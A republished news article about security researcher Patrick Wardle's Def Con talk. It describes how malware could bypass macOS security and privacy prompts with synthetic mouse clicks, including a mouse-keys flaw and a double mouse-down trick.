Dan Goodwin* finds that malware has no trouble hiding and bypassing macOS user warnings and can do ‘a lot of malicious stuff’.
Apple works hard to make its software secure.
Beyond primary protections that prevent malware infections in the first place, company engineers also build a variety of defence-in-depth measures.
Now, Patrick Wardle, a former National Security Agency hacker and macOS security expert, has exposed a major shortcoming that generically affects many of these secondary defences.
In a presentation at the Def Con hacker convention in Las Vegas, Mr Wardle said it was easy for a local attacker or malware to bypass many security mechanisms.
When these security measures detect a potentially malicious action, they will block that action and then display an alert or warning.
By abusing various programming interfaces built into macOS, malicious code could generate a programmatic click to interact or even dismiss such alerts.
This “synthetic click,” as Mr Wardle called it, works almost immediately and can be done in a way that is invisible to the user.
“The ability to synthetically interact with a myriad of security prompts allows you to perform a lot of malicious actions,” Mr Wardle said.
“Many of Apple’s privacy and security-in-depth protections can be trivially bypassed.”
With the ability to generate synthetic clicks, an attack, for example, could dismiss many of Apple’s privacy-related security prompts.
On recent versions of macOS, Apple has added a confirmation window that requires users to click an OK button before an installed app can access information stored on the Mac.
Apple engineers added the requirement to act as a secondary safeguard.
The thinking went that even if a machine was infected by malware, the malicious app wouldn’t be able to copy this sensitive data without the owner’s explicit permission.
Though many of Apple’s security alerts attempt to detect and ignore synthetic clicks, Mr Wardle discovered that the privacy alerts were not protected.
“What is the point of displaying an alert, if malware can simply dismiss it?” He asked.
In the past, malware has abused such synthetic clicks to perform a variety of nefarious actions.
For example, the sneaky Genio adware, DevilRobber currency mining malware, and the insidious Fruitfly malware stole millions of images from infected Macs over a 13-year period.
All used synthetic clicks to bypass defence-in-depth warnings.
Apple responded to this by improving the security of its operating system.
Now, in recent versions of macOS, security alerts and prompts will ignore synthetic events.
At least that was the idea.
In his presentation, Mr Wardle first illustrated how an attacker could abuse a feature of macOS called ‘mouse keys’ that would convert keyboard keypresses into mouse movements.
Mouse keys let a user move a mouse up, down, to the right or left, or in diagonal directions by pressing certain keys.
However, Mr Wardle illustrated how an attacker or malware could also leverage mouse key events to generate synthetic mouse clicks that would be accepted, even by protected security alerts.
He reported the issue to Apple, which released a supplemental update to patch it as CVE-2017-7150.
Now mouse keys are ignored by security alerts, and keychain access always requires a user’s password.
Even after Apple issued the patch, the warnings could still be bypassed.
While testing an older attack, Mr Wardle incorrectly copied and pasted some code.
Without realising the mistake, he ran the code, which to his amazement allowed him to post synthetic clicks to security alerts, even on a fully patched High Sierra system.
He realised his buggy code was sending two mouse ‘down’ events (instead of the typical mouse down, mouse up event).
“The system converts the second mouse down event to a mouse up event,” he said.
“Since this mouse up event is generated by the system, it is allowed to interact with security prompts.”
As a result of this issue, Mr Wardle was able to completely bypass the warnings when doing a variety of things that have serious security and privacy consequences.
Apple representatives didn’t respond to an email seeking comment for this post.
Mr Wardle, for his part, said the bypass raises questions about how the company rolled out the improvements.
“I wasn’t trying to find a bypass, but I uncovered a way to fully break a foundational security mechanism,” he said.
“If a security mechanism falls over so easily, did they not test this? I’m almost embarrassed to talk about it.”
* Dan Goodwin is the Security Editor at Ars Technica. He tweets at @dangoodin001.
This article first appeared at arstechnica.com.
